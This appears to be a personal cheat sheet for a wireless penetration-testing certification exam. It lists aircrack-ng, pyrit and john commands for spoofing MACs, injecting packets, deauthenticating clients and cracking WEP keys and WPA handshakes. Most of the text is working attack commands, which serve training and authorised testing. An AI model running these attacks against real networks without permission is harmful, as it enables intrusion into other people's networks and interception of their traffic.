|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed: 23.03.2017

Hacking wireless networks


This commandlist served as a cheat sheet for the Offensive Security Wireless Professional exam and shows the usage of the most common attack tools.

wifi attacks

preparation


show and stop interfering processes

systemctl stop NetworkManager
airmon-ng check [kill]

change MAC address

macchanger -m 00:11:22:33:44:55 wlan0

toggle monitor mode

airmon-ng start wlan0
airmon-ng stop wlan0mon

card to card injection test

With two wireless interfaces in monitoring mode you can test which explicit attacks are supported.

aireplay-ng -9 -i wlan1mon wlan0mon

prevent Network Manager from managing devices


If you want to keep your Network Manager running you can blacklist the MAC addresses of the interfaces which shall be ignored.

/etc/NetworkManager/NetworkManager.conf

...
[keyfile]
unmanaged-devices=mac:00:11:22:33:44:55
...

traffic capture


capture traffic( 2.4 and 5GHz)

airodump-ng --band abg --manufacturer wlan0mon

show manufacturer information

airodump-ng-oui-update
airodump-ng --manufacturer wlan0mon

attacking wep


The major flaw of the wep encryption lies in the possibility of a statistical attack based on weak initialization vectors. So the standard procedure consists of starting to dump the traffic, enforcing a lot of data packets and cracking the capture file.

collect ivs

airodump-ng -c 1 -w wep_file --ivs wlan0mon

open system authentication

aireplay-ng -1 60 -a <AP_MAC> -h <source_MAC> wlan0mon

shared key authentication

aireplay-ng -1 60 -y <xor_file> -a <AP_MAC> -h <source_MAC> wlan0mon

arp replay attack

aireplay-ng -3 -b <AP_MAC> -h <source_MAC> wlan0mon

chopchop attack

aireplay-ng -4 -b <AP_MAC> -h <source_MAC> wlan0mon

fragmentation attack

aireplay-ng -5 -b <AP_MAC> -h <source_MAC> wlan0mon

create ARP packet

packetforge-ng -0 -a <AP_MAC> -h <source_MAC> -l 255.255.255.255 -k 255.255.255.255 -y <xor_file> -w arp.cap

inject packet

aireplay-ng -2 -r arp.cap wlan0mon

crack the wep key

aircrack-ng wep_file.ivs

attacking wpa


WPA encrypted networks are regarded as secure and the only known attack is to brute force the 4-way handshake.

capture handshake

airodump-ng -c 1 -w wpa_file wlan0mon

deauthenticate client

aireplay-ng -0 1 -a <AP_MAC> -c <client_MAC> wlan0mon

strip unneeded packets

pyrit -r wpa_file.cap -o wpa_file_strip.cap strip

wordlist attack

aircrack-ng -w wordlist.txt wpa_file_strip.cap
pyrit -i wordlist.txt -r wpa_file_strip.cap attack_passthrough

brute force attack

john --incremental --stdout | aircrack-ng -w - wpa_file_strip.cap

precomputed pmk attack

pyrit -i wordlist.txt import_passwords
pyrit -e <essid> create_essid
pyrit batch
pyrit -r wpa_file_strip.cap attack_db

speed up with qw


As with managing wireless networks from the command line the script qw can be used to simplify sniffing and capturing of wpa handshakes.

capture handshake

qw s -c 1 -f wpa_file
qw d <bssid>